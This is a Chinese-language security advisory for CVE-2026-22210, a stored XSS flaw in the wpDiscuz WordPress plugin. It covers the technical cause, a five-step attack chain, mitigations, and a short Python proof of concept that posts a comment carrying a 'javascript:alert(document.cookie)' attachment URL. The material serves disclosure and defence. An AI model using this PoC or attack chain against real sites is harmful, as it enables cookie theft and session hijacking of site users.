CVE-2026-22210 CVSS 4.4 中危

CVE-2026-22210: wpDiscuz跨站脚本漏洞

披露日期: 2026-03-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22210

漏洞类型

XSS（跨站脚本）

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

wpDiscuz (WordPress插件)

漏洞概述

wpDiscuz是WordPress的一个流行的评论插件，在7.6.47之前的版本中存在存储型跨站脚本(XSS)漏洞。该漏洞存在于WpdiscuzHelperUpload类中，允许攻击者通过未转义的附件URL在HTML输出中注入恶意代码。攻击者可以构造恶意的附件记录或利用过滤器钩子将任意JavaScript代码注入到img和anchor标签属性中。当WordPress用户在查看评论时，这些恶意脚本会在用户浏览器中执行，可能导致会话劫持、敏感信息窃取或对用户进行进一步攻击。由于攻击需要低权限用户身份且需要用户交互，该漏洞的CVSS评分为4.4，属于中等严重程度。

技术细节

漏洞根源在于wpDiscuz插件的WpdiscuzHelperUpload类在处理附件URL时未进行适当的输出转义。当用户上传附件时，系统会将附件URL存储到数据库中，但在后续显示评论时，这些URL被直接输出到HTML中而没有进行HTML实体转义。攻击者可以通过以下方式利用：1) 创建恶意附件记录，其URL包含JavaScript代码；2) 利用WordPress的过滤器钩子修改附件URL属性；3) 注入的代码会被包含在img标签的src属性或anchor标签的href属性中。由于这些属性值未经过滤，当评论被其他用户查看时，恶意JavaScript代码便会执行。攻击者可以利用此漏洞窃取用户Cookie、劫持会话或执行其他客户端攻击。

攻击链分析

STEP 1

Reconnaissance

识别目标WordPress站点，确认安装了存在漏洞的wpDiscuz插件版本

STEP 2

Authentication

以低权限用户身份登录WordPress

STEP 3

Payload Preparation

构造包含恶意JavaScript代码的附件URL

STEP 4

Injection

通过评论表单提交恶意附件，触发XSS漏洞

STEP 5

Execution

当其他用户查看包含恶意代码的评论时，JavaScript代码在其浏览器中执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
from bs4 import BeautifulSoup

# PoC for CVE-2026-22210
target_url = "http://target-wordpress-site.com"

# Step 1: Login as low-privilege user
session = requests.Session()
login_data = {"log": "attacker", "pwd": "password"}
session.post(f"{target_url}/wp-login.php", data=login_data)

# Step 2: Create comment with malicious attachment URL
malicious_url = "javascript:alert(document.cookie)"
comment_data = {
    "comment": "Check this attachment",
    "attachment_url": malicious_url
}
session.post(f"{target_url}/wp-comments-post.php", data=comment_data)

影响范围

wpDiscuz < 7.6.47

防御指南

临时缓解措施

如果无法立即升级，可临时禁用wpDiscuz插件的附件功能，或在Web应用防火墙(WAF)层面添加规则阻止包含javascript:协议的URL

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表